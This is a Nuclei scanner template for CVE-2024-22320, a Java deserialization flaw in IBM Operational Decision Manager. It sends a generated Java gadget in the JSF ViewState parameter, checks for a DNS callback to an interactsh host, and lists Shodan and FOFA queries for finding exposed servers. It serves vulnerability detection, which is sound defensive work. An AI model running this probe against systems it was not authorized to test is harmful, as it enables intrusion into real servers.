nuclei-templates/http/cves/2024/CVE-2024-22320.yaml

54 lines
1.9 KiB
YAML

id: CVE-2024-22320
info:
name: IBM Operational Decision Manager - Java Deserialization
author: DhiyaneshDK
severity: high
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
reference:
- https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2024-22320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-22320
cwe-id: CWE-502
epss-score: 0.38316
epss-percentile: 0.97125
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query:
- html:"IBM ODM"
- http.html:"ibm odm"
fofa-query:
- title="IBM ODM"
- title="ibm odm"
- body="ibm odm"
tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce
http:
- method: GET
path:
- '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'javax.servlet.ServletException'
- type: status
status:
- 500
# digest: 4b0a00483046022100bb5445a0a7a75731a60c4f541edc93846d4b21a800881005eb87588c9efe49a5022100c19eb39aff09e8bb429bb5c62816d7c8c8f6aff8bf92d80e455c4e9d0591e021:922c64590222798bb761d5b6d8e72950